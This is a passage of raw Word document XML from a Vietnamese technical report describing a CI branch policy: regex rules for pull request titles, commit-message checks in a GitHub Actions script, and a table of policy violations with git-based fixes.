        </w:rPr>
        <w:t xml:space="preserve">, hoặc cố ý hợp nhất nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ngược trở lại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, bảo đảm mọi thay đổi bắt buộc phải đi qua bậc thang kiểm định trên nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trước khi bước vào môi trường sản xuất.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2.2. Quy chuẩn tiêu đề Pull Request 2 tầng (Two-Tier PR Naming)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Stage 1 tự động phân tích tiêu đề của Pull Request thông qua hai bộ biểu thức chính quy (Regular Expressions) chuyên biệt theo tầng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tầng 1 — Đóng góp tính năng từ nhánh cá nhân vào nhánh `dev`:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tiêu đề bắt buộc phải chứa mã định danh của thành viên phụ trách thuộc nhóm nghiên cứu, theo sau là phân loại commit chuẩn và phạm vi ảnh hưởng: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^\[(namng|haind|manhdx|anhld|mainp)\]\s+(feat|fix|sec|ci|docs|refactor|test|chore|style|perf|revert)(\([a-zA-Z0-9_\-\.\/]+\))?:\s.+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Ví dụ hợp lệ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>[namng] feat(db): bổ sung endpoint healthcheck phục vụ preview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>[manhdx] sec(auth): ngăn chặn lỗ hổng bypass token JWT</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Tầng 2 — Phát hành chính thức từ nhánh `dev` vào nhánh `main`:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tiêu đề bắt buộc phải tuân thủ nghiêm ngặt quy tắc định danh phiên bản ngữ nghĩa (Semantic Versioning - SemVer) với cú pháp phát hành chính thức:</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^(release|RELEASE):\s+v[0-9]+\.[0-9]+\.[0-9]+(\s+-\s+.+|\s*:\s*.+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc định danh phiên bản:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>vX.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Major - thay đổi lớn phá vỡ tính tương thích ngược), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>v1.X.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Minor - bổ sung nhóm tính năng mới nhưng tương thích ngược), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>v1.0.X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Patch - vá lỗi khẩn cấp hoặc vá an ninh).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Ví dụ hợp lệ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>release: v1.0.0 - Triển khai cổng thông tin Logistics InlaneWeb lên Production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2.3. Cơ chế quét lịch sử Commit trong Payload và hướng dẫn xử lý vi phạm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Không chỉ dừng lại ở việc kiểm tra tiêu đề Pull Request, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/policy_guard.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> còn bóc tách toàn bộ mảng dữ liệu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>commits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong webhook payload của GitHub Actions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>event_data.get("commits", [])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>). Mọi commit đơn lẻ được đẩy lên nhánh đều được đối chiếu với quy chuẩn Conventional Commits (ngoại trừ các merge commit mặc định của Git). Nếu phát hiện bất kỳ commit nào vi phạm định dạng, Stage 1 sẽ lập tức đánh dấu thất bại.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Điểm nổi bật của công cụ Stage 1 là cơ chế </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>phản hồi có tính định hướng khắc phục</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Actionable Developer Feedback):</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Khi phát hiện vi phạm, hệ thống sử dụng cú pháp chú thích tiêu chuẩn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>::error title=...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để hiển thị khung thông báo đỏ trực quan ngay trên giao diện dòng lệnh và bảng điều khiển GitHub Actions.</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Hệ thống đồng thời trích xuất thông điệp vi phạm và in kèm khối lệnh hướng dẫn khắc phục cụ thể:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu commit sai quy chuẩn: Cung cấp lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>git commit --amend -m "feat(&lt;phạm_vi&gt;): &lt;mô tả lại cho đúng&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> đối với commit gần nhất, hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>git rebase -i HEAD~&lt;n&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> khi có nhiều commit sai.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu tiêu đề PR sai quy cách: Hướng dẫn kỹ sư nhấn nút </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> cạnh tiêu đề PR trên GitHub để điều chỉnh lại theo đúng mẫu mà không cần phải thực hiện commit lại mã nguồn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu PR mở sai nhánh đích: Yêu cầu đóng Pull Request hiện tại và mở Pull Request mới hướng vào nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2.4. Bảng tổng hợp các tình huống vi phạm chính sách và biện pháp xử lý</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bang"/>
        <w:spacing w:before="240" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 2.2: Bảng tổng hợp các tình huống vi phạm chính sách phân nhánh và biện pháp xử lý</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2367"/>
        <w:gridCol w:w="2367"/>
        <w:gridCol w:w="2367"/>
        <w:gridCol w:w="2367"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Tình huống vi phạm</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Biểu hiện lỗi trên GitHub Actions</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Nguyên nhân kỹ thuật</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Hướng dẫn xử lý khắc phục</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Commit sai cú pháp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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::error title=Sai định dạng tiêu đề Commit</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Tiêu đề commit thiếu tiền tố quy chuẩn (ví dụ: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>update code</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>).</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Chạy lệnh </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>git commit --amend</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sửa lại tiêu đề chuẩn, sau đó </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>git push --force origin &lt;nhánh&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Tiêu đề PR vào `dev` bị từ chối</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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::error title=Sai quy ước đặt tên PR vào dev</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Thiếu mã định danh thành viên hoặc sai cú pháp (ví dụ: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fix login error</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>).</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Nhấn nút </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Edit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> cạnh tiêu đề PR trên giao diện GitHub, đổi thành </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>[&lt;mã_nhánh&gt;] fix(auth): mô tả sự cố</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> và bấm Save.</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PR vào `main` bị chặn đứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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::error title=Vi phạm luồng phân nhánh</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Mở PR trực tiếp từ nhánh cá nhân (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>namng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>haind</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">...) vào </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</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Đóng PR vi phạm. Tạo PR mới với nhánh đích là </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dev</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> để thực hiện kiểm định tích hợp trước.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Tiêu đề PR phát hành sai chuẩn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2367"/>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::error title=Sai quy ước đặt tên PR vào main</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Tiêu đề PR vào </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> không tuân theo định dạng phát hành SemVer.</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Nhấn nút </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Edit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
